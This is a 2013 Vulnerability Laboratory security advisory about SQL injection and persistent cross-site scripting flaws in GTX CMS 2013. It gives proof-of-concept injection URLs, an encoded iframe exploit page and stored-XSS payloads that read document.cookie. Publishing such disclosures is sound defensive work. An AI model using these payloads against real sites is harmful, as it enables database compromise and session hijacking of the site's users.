298 lines
13 KiB
Text
Executable file
298 lines
13 KiB
Text
Executable file
Document Title:
|
|
===============
|
|
GTX CMS 2013 Optima - Multiple Web Vulnerabilities
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
http://www.vulnerability-lab.com/get_content.php?id=1124
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2013-10-29
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
1124
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
7.2
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
We provide you with the perfect community GTX CMS software solution - making it ready to meet your needs and
|
|
requirements and tailored to your corporate design! The complete setup of your individual interactive community
|
|
portal or your website is done by us, so you can get started right away!
|
|
|
|
GTX CMS is extremely flexible and can be operated as a closed community (eg parallel to your existing website)
|
|
and as a normal website with a closed member.Datails, refer to the section `About GTX CMS`.
|
|
|
|
(Copy of the Vendor Homepage: http://www.gtx-cms.de/ )
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official GTX Content Management System 2013 web application.
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2013-10-29: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
OBM-Media e.K.
|
|
Product: GTX CMS - Web Application Basic, Standard and Optima
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
High
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
1.1
|
|
Multiple remote sql injection web vulnerabilities are detected in the official GTX Content Management System 2013 web application.
|
|
The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the web-application or the web-server dbms.
|
|
|
|
The sql injection vulnerabilities are located in the vulnerable `objId` and `modId` values of the tagSearchTag module. Remote attackers are
|
|
able to inject own sql commands via GET method request to compromise the database management system or cms web-application. The inject can
|
|
be done by usage of the executable ajax path via GET method request or by usage of the objId in the tagSearchTag module POST method request.
|
|
The severity of the remote sql injection bugs is estimated as high.
|
|
|
|
Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
|
|
Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise.
|
|
|
|
|
|
Vulnerable Module(s):
|
|
[+] ajax
|
|
|
|
Vulnerable File(s):
|
|
[+] tagSearchTag
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] objId
|
|
[+] modId
|
|
|
|
|
|
|
|
1.2
|
|
Multiple persistent input validation web vulnerabilities are detected in the official GTX Content Management System 2013 web application.
|
|
The web vulnerability allows remote attackers to inject via POST method own malicious script codes to the online service application-side.
|
|
|
|
The first persistent input validation web vulnerability is located in the ajax `tag-searchTag` module and the connected vulnerable
|
|
q parameter. Remote attackers are able to inject own malicious script codes as tag name. The execute occurs in the main communication
|
|
module when an user/admin is processing to review the article or comments. Exploitation of the vulnerability requires a low privileged
|
|
web-application user account and only low user interaction (view, no click!).
|
|
|
|
The secound persistent web vulnerability is located in the `linkverzeichnis` (link-directory) add module. Remote attackers are able
|
|
to inject own malicious script codes as `Schl?sselworter` (keywords) in the search. The execute occurs in the main link directory
|
|
module of the web-application. Exploitation of the vulnerability requires a low privileged web-application user account and low or
|
|
medium user interaction (click!).
|
|
|
|
The third persistent web vulnerability is located in the `Ordnerverwaltung` (Folder/Path Management) module. Remote attackers are
|
|
able to manipulate the vulnerable `ordner` name value in the add POST method request. The execute occurs in the main path of the
|
|
`persoenliche nachrichten` (private messages) module in the cms control panel. Exploitation of the vulnerability requires a low
|
|
privileged web-application user account and medium user interaction (add+click!).
|
|
|
|
Successful exploitation of the remote vulnerabilities lead to persistent session hijacking (customers), account steal via persistent
|
|
web attacks, persistent phishing, persistent redirect to external sources, persistent redirect as file downloads or persistent
|
|
manipulation of affected and connected context.
|
|
|
|
|
|
Vulnerable Module(s):
|
|
[+] ajax/tagSearchTag
|
|
[+] suche/linkverzeichnis
|
|
[+] pers-nachrichten/ordnerverwaltung
|
|
|
|
Vulnerable Input(s):
|
|
[+] Tags
|
|
[+] Suche - Linkverzeichnis > Schl?sselw?rter - Suchbegriff(e) & Entfernung von
|
|
[+] Orderverwaltung - Add
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] q
|
|
[+] keywords
|
|
[+] ordner
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
1.1
|
|
The sql injection web vulnerabilities can be exploited by remote attackers with low privileged web application user account and
|
|
without user interaction. For demonstration or to reproduce ...
|
|
|
|
PoC:
|
|
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd&objId=37_%20'null[SQL INJECTION VULNErABILITY!]--
|
|
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd%20'null[SQL INJECTION VULNErABILITY!]--&objId=3
|
|
|
|
|
|
Exploit:
|
|
<script type=``text/javascript``>document.write(unescape(``<script type=\``text\/javascript\
|
|
``>document.write\(unescape\(\``%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EGTX%20CMS%20-
|
|
%20SQL%20INJECTION%20EXPLOIT%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//gtx.localhost
|
|
%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId%3Dptd%26objId%3D37_%2520%27null
|
|
%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D%22800%22%3E%0A%3C
|
|
iframe%20src%3Dhttp%3A//gtx.localhost%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId
|
|
%3Dptd%2520%27null%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D
|
|
%22800%22%3E%26objId%3Dx%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E%0A%0A\``\)\);<\/script>``));</script>
|
|
|
|
|
|
|
|
|
|
1.2
|
|
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged web application user accounts
|
|
and low user interaction. For demonstration or to reproduce ...
|
|
|
|
|
|
1.2.1
|
|
|
|
PoC: Tags in Article or News
|
|
<div class=``right``>
|
|
<div id=``tagTagsWidget``>
|
|
<ul class=``as-selections`` id=``as-selections-049``><li class=``as-selection-item blur``
|
|
id=``as-selection-002``><a class=``as-close``>?</a>>``<iframe src=``GTX-CMS.de%20%20Mitglieder-
|
|
Communities%20f%C3%BCr%20Golfclubs,%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20
|
|
geeignet%20%C2%BB%20Linkverzeichnis%20%C2%BB%20Link%20hinzuf%C3%BCgen_files/a.htm``></iframe></li><li class=``as-original``
|
|
id=``as-original-049``><input autocomplete=``off`` name=``tags`` id=``as-input-049`` class=``text as-input`` type=``text``>
|
|
<input value=``>``<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>>``
|
|
<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>,>``
|
|
<iframe src=http://vuln-lab.com>,`` class=``as-values`` name=``as_values_049`` id=``as-values-049`` type=``hidden``></li></ul>
|
|
<div style=``display: none;`` class=``as-results`` id=``as-results-049``></div>
|
|
</div>
|
|
|
|
|
|
Inject: Tags
|
|
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
|
|
|
|
PoC (PATH):
|
|
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E&modId=ptd&objId=null
|
|
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E%20&modId=ptd&objId=null
|
|
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Dhttp%3Avuln-lab.com%3E&modId=ptd&objId=null
|
|
|
|
|
|
|
|
1.2.2
|
|
|
|
PoC: Suchbegriff(e) & Entfernung von
|
|
|
|
<div class=``box``>
|
|
<div class=``formItems``>
|
|
<div class=``item row1``>
|
|
<div class=``left``>
|
|
Schl?sselw?rter</div><div class=``right``>>``<iframe src=``GTX-CMS.de%20%20Mitglieder-Communities%20f%C3%BCr%20Golfclubs,
|
|
%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20geeignet%20%C2%BB%20Suche%20%C2%BB%20
|
|
Linkverzeichnis%20%C2%BB%20Ergebnisse2_files/a.htm`` onload=``alert(document.cookie)`` <=```` div=````>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
|
|
|
|
Inject: Suchbegriff(e) & Entfernung von
|
|
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
|
|
|
|
Output:
|
|
Suche - Linkverzeichnis > Schl?sselw?rter
|
|
http://gtx-cms.localhost:8080/suche/linkverzeichnis
|
|
|
|
|
|
|
|
|
|
1.2.3
|
|
|
|
PoC: Ordnerverwaltung - Ordner Name
|
|
|
|
<li class=``seperator``></li>
|
|
<!-- Users folders -->
|
|
<li><a class=``icon`` href=``/pers-nachrichten/ordner/iframe-srchttpvuln-labcom-onloadalertdocumentcookie-
|
|
iframe-srchttpvuln-labcom-onloadalertdocumentcookie-_1``>
|
|
<img src=``images/icons/Sophistique/files_24.png`` alt=``Ordner``>
|
|
<span>>``<iframe src=``http://vuln-lab.com`` onload=``alert(document.cookie)`` <=``
|
|
%20%20.``>``<iframe src=http://vuln-lab.com onload=alert(document.cookie) < (0)</span>
|
|
</a></li>
|
|
|
|
|
|
Inject: OrderVerwaltung Add
|
|
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
|
|
|
|
Output: Pers?nliche Nachrichten
|
|
http://gtx-cms.localhost:8080/pers-nachrichten
|
|
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
|
|
|
|
|
|
Solution - Fix & Patch:
|
|
=======================
|
|
1.1
|
|
The sql injection web vulnerabilities can be patched by a secure parse and encode of the vulnerable `modId` and `objId` values in
|
|
the tag search module.
|
|
|
|
1.2
|
|
The persistent input validation web vulnerabilities can be patched by a secure parse and encode of the vulnerable
|
|
ordner name, q and keyword parameters.
|
|
Encode the output index of the ordner name in the private messages box and connected resources.
|
|
Parse the tag search error output to prevent script code executions.
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
1.1
|
|
The security risk of the remote sql injection web vulnerabilities are estimated as high(+).
|
|
|
|
1.2
|
|
The security risk of the persistent input validation web vulnerabilities are estimated as medium(+).
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
|
or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
|
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
|
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY RESEARCH TEAM
|
|
DOMAIN: www.vulnerability-lab.com
|
|
CONTACT: research@vulnerability-lab.com
|
|
|
|
|